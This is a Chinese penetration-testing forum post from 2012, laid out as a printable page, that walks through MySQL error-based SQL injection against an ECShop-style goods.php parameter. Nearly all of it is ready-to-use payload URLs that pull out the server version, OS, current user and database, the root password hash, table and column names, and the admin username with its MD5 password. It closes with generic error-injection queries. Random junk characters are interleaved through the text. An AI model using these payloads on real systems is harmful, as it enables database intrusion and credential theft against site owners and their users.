中国网络渗透测试联盟

标题: 盲注详细内容 [打印本页]
作者: admin    时间: 2012-9-5 14:59
标题: 盲注详细内容
判断版本号
4 Q% C6 h: L2 q; ~http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%232 ?+ P$ z& ?0 i9 i$ T
. E2 m" d) X6 ~; `8 c; h
判断系统
1 t$ W4 ?$ v) w& N
! g, Z. Z0 e" mhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
5 R. C3 Q) V% X. v! Q6 @. P" X. {& v& m( Y/ @2 l

( }( o9 u$ g* P' p. f1 Y  D; L$ ]9 |& D' C! {. T) c: F7 @$ m
当前 user()
/ l( v0 y0 q9 y0 H. p1 s
- }+ ]: [# [: \http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23) b, k8 W' `5 b0 ?1 i3 F. I
# O0 |+ j8 P1 l/ @: t
0 A  O! [0 |; H# p- h5 }1 G
! u* B4 S$ l8 B. K2 _1 q8 F# @- }
当前 database()
0 `  c  W3 K# T( shttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
5 k1 n/ S/ V1 v: d: N4 Q2 s4 N3 \$ B3 _9 S2 V
5 G, I+ H) B# l  Y

% b  T. L/ `  a2 |0 [. y+ M
! [& k3 M8 `1 P+ z1 o) t5 P) J% Z: uroot hash
! w2 O. s7 f4 }# f2 Y+ ~: q& u/ e0 c& E8 k1 g
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
/ f+ p2 G  n! l! f% ^- l: H5 r+ V. N; E1 V' F, j3 r9 S

3 x4 I+ J: y( J
3 d3 s1 X0 f4 j5 W1 N当前 数据库表名
- D8 C, k1 Q) S" q2 y. _1 s2 ~. ~, O) i* P: ^4 u  G
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
' A* A( V+ Z& ?& h* @/ M; _" B
4 g3 K( H: I0 K9 J2 w2 @
! m$ \& w4 E/ z4 {7 z* V' d( @6 r/ k4 }- Q- k+ V
当前 数据库 user_name 字段
# j3 F- l( K/ z; B( }( U; L0 [/ I- r5 J, b' t, P4 v
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%231 e( _1 Q/ ?" n6 u: ?% N% [
1 [2 H' U* A/ {$ ~% [1 R; e6 Y5 X  {
当前 数据库 字段 password
. u* o/ y/ m1 `- {/ S4 j& ihttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%236 |2 _" t# y8 L4 y, _) @; Y* O0 R
2 }% J3 Y+ ?" |( d

& f; ]" p9 R' n- m) }  E* P; m5 Q8 I! q5 {# l0 X
获得 admin passwd(md5)1 R; u- k! a' h" r5 x& L0 t* s
& F7 M3 Y2 m5 E% ]/ R

2 B! ^  D5 r. }. }http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23. k' O0 @: K8 Q
2 ?- g7 j4 ?# n+ I. X
报错注射! P0 _1 N- s# Z; _7 h( _; K
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)+ o, G% c4 A$ M

' M1 Q7 D8 Y- t  w1 FSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
% q8 z1 a: V+ X% g$ S# C& p- p1 w/ W5 t
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2